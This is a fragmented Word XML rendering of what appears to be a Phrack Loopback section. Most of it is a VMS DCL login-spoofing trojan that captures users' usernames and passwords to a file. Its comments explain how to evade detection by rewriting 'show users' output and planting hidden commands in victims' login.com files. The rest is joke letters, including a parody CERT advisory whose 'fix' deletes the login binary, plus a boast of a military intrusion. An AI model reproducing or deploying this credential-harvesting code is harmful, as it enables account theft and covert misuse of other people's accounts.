      </w:r>
    </w:p>
    <w:p w14:paraId="4585031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$open/append io user.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD51A9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 user + " " + pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6B0A3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3174ED7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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC72C0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Sends the user into their account !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF0BFB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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF6B72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$open/write io set.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD227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 "$set host 0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7F29A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 user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6D0AD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 pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E46800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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB3C4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$@set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61353E0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529A37A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Control has been returned to your account !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01563E6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5313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 " [2A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305CDF9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outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FBAC4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530C1D1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Simulates a failure if the password is null, and also if the !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C5EA2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username prompt has cycled through 15 times... This is what  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB3D2D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the system login screen does.                                !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ACA70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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890630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$fail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4632DE5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 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2888028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$c1 = c1 + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D4B50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"User authorization failure"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30AC4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 [1A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394EBDA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inner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCE3B4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC518E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After the third failure, the system usually sends the screen back !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A59A81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one step...this just handles that.                                !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C92677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!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579792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$fail3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFE00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 [2A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A274B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outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A635F6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150AA2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The system keeps a timeout check in the login. If a username is not !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9B32B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entered quickly enough, the timeout message is activated            !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F56CF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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C617CC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$timeout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCE67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term/nouppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B21321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"Error reading command input"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538BDA0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"Timeout period expired"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3737019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$wo " [2A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54443A7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outer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5884E8A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7DDE830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There is a feature in this program which sets the terminal to        !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5538A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uppercase for the input of a username. This is wonderful for         !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6C010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preventing program detection, but it does cause a problem. It slows  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666FCAD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the screen down, which looks suspicious. So, in the case where a     !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C4C85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user walks up tot he terminal and holds the return key down for a    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4744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bit before typing in their username, this section speeds up the run  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722506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considerably.                                                        !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116E1EF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48A7CA6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$speedup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680D440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term/nouppercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF7ECF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$fast_loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454A24C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$user = "a"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4870F15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$read/time_out=1/prompt="Username: " sys$command io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE70EF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user .eqs. "a" then goto from_speedup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E35DF5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fast_loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C5DCA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58ADE60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This section is optional. There are many ways that you can implement !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E76B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to break out of the program when you think you have gotten enough    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFCC14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passwords. 1), you can sit down at the terminal and type in a string !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278F1A6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for the username and pass which kicks you out. If this option is     !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F5C7C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implemented, you should at least put in something that looks like    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFED52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you have just logged in, the program should not kick straight back   !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43C5D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to your command level, but rather execute your login.com. 2) You     !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C094AA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!!!! can log in to the account which is stealing the password from a      !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B82C7E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different terminal and stop the process on the account which is      !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733CE3A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running the program. This is much safer, and my recommandation.      !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F76B7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0BE2ABB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$done:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3670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broadcast=mail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF346B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message/facility/text/identification/severity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC3E9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$delete dummy.txt;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68293AA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$exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC342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!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29459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This section is how one covers up the fact that the account which has !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60472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been stolen is running out of another. Basically, the area of the show!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4196F9C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users screen which registers this is at the far right hand side.      !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F8901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This section first writes the show users data to a file and alters    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBE16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it before it is written to the screen for viewing by the user. There  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C2DE3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may exist many forms of the show users command in your system, and    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D4E8C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you may have to handle each one differently. I have written only two  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F32E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manipulations into this code to be used as an example. But looking    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535D088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at how this is preformed should be enough to allow you to write your  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C09D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own special cases. Notice that what happens to activate this section  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B15F4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of the program is the computer detects the word "show" and interprets !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A21F0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it as a procedure call. The words following show become variables     !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="368C6A3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passed into the program as p1, p2, etc. in the order which they       !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D4902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were typed after the word show. Also, by incorporating a third data   !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAC35B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file into the manipulations, one can extract the terminal id for the  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059665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account which the program is running out of and plug this into the    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7676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place where the user's line displays his or her terminal id. Doing    !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1806866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this is better that putting in a fake terminal id, but that is just a !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5EE8D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minor detail.                                                         !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D18897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!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415EFEB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$show:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745D78F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 = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F632B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$show$ = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005272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$length = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BB8FE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$ch = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568C8C7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$full = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F5EB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$c = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69BB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(f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5DDCA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(p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E6192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p2 .eqs. "USERS" .and. p3 .eqs. "" then show users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315EDE8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p2 .eqs. "USERS" .and. p3 .eqs. "" then exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8ADAB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p3 .eqs. "" then goto fallout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF4C4B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full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452B897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$fallout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3245135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 'p2' 'p3'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F03AF2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$exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B63F82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$ufull:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75341A2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 users/full/output=users.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD361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manipulate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371196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$full:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E8406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$show$ = p3 + "/output=users.dat"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFCCF1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 users 'show$'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A2A83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$manipulate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001BF23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message/nofacility/noseverity/notext/noidentification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B26FBB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$open/read io1 users.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3193AB5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$open/write io2 users2.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09212D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58DF569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Control_y must be dealt with here. If the user did happen to controlY !!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B09E36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there is a chance that the files users.dat and users2.dat could be    !!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1565CCA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left in their directory. That is a bad thing as we are trying to      !!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D67C04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prevent detection :)                                                  !!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10497AA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6DF33E7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$on control_y then goto aborted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1623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$user = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B115D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$test = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440A85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$long = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8647A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$ch = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D77A0C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$length = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51605E6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$user = f$user()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7912099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$length = f$length(user) - 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4406582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$user = f$extract(1,length,user)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4270542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$read_loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A58B49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$read/end_of_file=eof io1 line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68157B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$test = f$extract(1,length,line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B39154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$ch = f$extract (length+1,1,line)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F1CB7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(test .eqs. user) .and. (ch .eqs. " ") then goto change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12174E1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$from_change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231B116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io2 line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6078A3B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read_loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2CAB6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$eof:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB72ED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io1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718C7A9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io2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3548E60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$type users2.dat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AE54D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$del users.dat;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FAA1D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$del users2.dat;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441E883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 == "@instaar_device:[MILLER_G]findnext show"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625DB10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message/facility/text/severity/identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5C3E3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$exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CBAF6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$change:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3115D49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$if f$extract(50,1,line) .nes. "" then line = f$extract(0,57,line) + "(FAKE TERMINAL INFO)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D88B51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from_change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7097005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$aborted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF558D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$!if f$search("users.dat") .nes. "" then close io1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EB39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$!if f$search("users.dat") .nes. "" then delete users.dat;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521C35D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$!if f$search("users2.dat") .nes. "" then close io2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4B5E3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$!if f$search("users2.dat") .nes. "" then delete users2.dat;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296A324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io1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A17C6E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io2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D356D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$delete users.dat;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BA417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$delete users2.dat;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056EB65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$show == "@instaar_device:[MILLER_G]findnext show"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035528E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$set message/facility/text/severity/identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750EF9D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$exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A93715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6570FFD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This is the section of the program which is executed in place of the !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1382A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users login.com. It does grab their login and execute it to prevent  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7688B05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suspicion, but there are a couple of hidden commands which are also  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E2BC3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added. They redefine the show and sys commands so that the user can  !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395C9C6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 not detect that he or she is riding off of another account.          !!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E9A57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!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7E867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$other:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F9B68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$sh$ = "@instaar_device:[miller_g]findnext show"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DC72C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$shline = "$sh*ow ==" + sh$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282CCB7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$logi = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59862F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$logi = f$search("login.com")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC806F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$if logi .NES. "" then goto Ylogin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C064F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$nologin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDF76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$open/write io login2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0239E41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 shline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF475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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5391261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$@login2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026FC58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$delete login2.com;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FA8C1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$exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC137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$ylogin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E46C7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$open/write io2 login2.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3120F03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$open/read io1 login.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AC143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$transfer_loop:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F8E1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$read/end_of_file=ready io1 line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4149FC1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io2 line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58D6F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$goto transfer_loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413CC9E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$ready:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541A97E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$write io2 "$sh*ow == ""@instaar_device:[miller_g]findnext show""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4181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io1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B779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$close io2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F8A4C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$@login2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD6C2A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$delete login2.com;*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF688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$exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE88F1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6CD7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5DD3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Thanks for the letter and program.  I wish I could bring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5938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myself to use a VMS and try it out.  :)  Always happy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB878A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 get notice that somewhere out there a female reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F89E3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Phrack.  By the way, "innocent female" is an oxymoron.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DB7DA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F397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3EFB877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954F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To:   Phrack Loopback.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798CAAE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From: White Crocodile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2484EB0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8811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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BC651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Greetings sweet Phrack and Mr. Bloodaxe. Your "loopback reports"  is</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7FA74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cool invention and I (sorry for egoisthic "I") with  pleasure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41534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wasting time for his reading ( ex. my playboy time ). But  here  for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2436F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unknown reason appear equal  style,  and  all  loopback  remind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C69D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medium between "relations search" [Hello Dear Phrack, I am</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F55DA2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expert of our local area, but when I looked  to  output  of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9E59E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"last" program (oh,yeah - "last" it is ...), I ocassionaly  under  -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EC40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standed  what apparently someone elite  hacker  penetrated  into  my</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567CB7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unpassworded  account!  But  how  he  knew  it???  I  need  to  talk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A9D9F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him! Please mail me at security@...] and "make yourself" [Yep.I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541AC54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totally wrote program which gets file listing from target  vicitim's</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220ED64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directory in current host. After that I decided  to  contribute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3F8FC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for You. I hope this will help. Here is the complete C code. "rx"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B964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permission in target's '$HOME' required.].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B417C4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Looking similar articles like "... off Geek!" and  various  reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A49C97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don't reacheds PWN. [CENSORED BY ME].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC2EF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Resulting from abovewritten reason and I let  myself  to  add  some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6064A1E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elite (oops word too complex), some bogus and little deposit to Your</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4688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lb. He written in classic plagiarize style.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AA05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!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F6044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*  *  *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E9CA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Good mornin' Ladys and Gentelmen! I hacking and phreaking. I know what</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069CF82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it is horrible (don't read it please - this message to Bart),  but  I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9CF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doing it all the time (today already 3 month). I have not much time to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB93DD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write, and here is the subject - I broke into  one  military  computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F85BD8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and stole their mail about new security bug!!! l00k f3r |t:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C4402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DF1C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- - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9168C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DDN &amp; CERT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216DCCC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SPECIAL REPORT*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C55952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Sun 3.x,4.1.x login flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48E9F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483E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Subject: The huge Sun 4.x login hole.(possibly Ulitix 3.0,BSD,AIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6185AA6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and many yet unknown systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE64D8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97C1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Impact: Allow random intruders to gain "root" access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355ACA8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8C27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0BE9EB4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huge security hole was there and waiting! Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F41A1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91A7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 login root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E99906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6010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 no option required ], and You are! All what You need to know its</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA2778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root's password, but it (pw), sure, can be easily obtained from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD07E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 root, by asking him (root). Ex - "$ talk root"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C88B2B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D29B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Possible fix until copyrighted patch come out:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C76286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89F8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#rm /usr/bin/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BF88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#cp /usr/games/fortune /usr/bin/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1249EC4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ADB4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If you believe that your system has been compromised, contact CERT CC. Call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA169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our hotline 900-FBI-PRIVATE (24 a day,please not in dinner time or in  time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20009D3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of "Silence of the Lamb"), leave Inet address of your system and  number of</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CB12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private credit card.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604430E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- - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314052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7563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 Report not will be printed in cert advisories in this form, becouse FBI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7453E8D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remove all hints and tips, and make him useless to intruders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5217ED3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4863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DISCLAIMER: Above document written by CERT, DDN and FBI -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CEA68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all pretension to them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD777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726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Thanks to gr*k (I can't write his full name for security reasons),roxtar,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55608C9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y0,Fidelio,2 scotts from Santafe,KL (He not have attitude  towards  this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FDF12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mail,but I included him for polite since he reserved tickets for me  to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7019CB9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SUMMERCON),ahh,x0d,all zero's (count,bob,nick,etc.) and many others for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A38ED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hints to me, what this bug really exist (Yep, before I stoled report).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC5A4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00CC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Write You later - anonymous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C787A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C35E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P.S. Yup! If You won't think what I am toady - I wanna say also thanks to TK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D0B7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and sure Erik Bloodaxe. And also - IF after E911 incident you are more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCE2D5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carefully, feel free to replace "stole" to "got" (when you'll post it),  and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAF7E7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do not forget to add "reprinted with permission".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94475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0DA5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Sincerely, anonymous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B446B3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1ADE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0909C5C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5EA3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More indications that we will all be raided by the DEA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327284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more often than the FBI in coming years.]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0041260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BB1A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14:paraId="7EBB43D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64D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16C8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"Since my probation status forces me to be adamant about this. Illegal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312D76A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activities on Netsys cannot and will not be tolerated. Prison sucked."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382D7E9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613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- Len Rose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C4463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647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06/6/93</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A5872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EBC0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COMMUNICATION SERVICES  Palo Alto, California</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C0691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C0CD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is a network of large Sun servers dedicated to providing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD66A0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Internet access to individuals and corporations that need solid,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AD7B8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reliable Internet connectivity.  Netsys is at the hub of major</w:t>
      </w:r>
    </w:p>
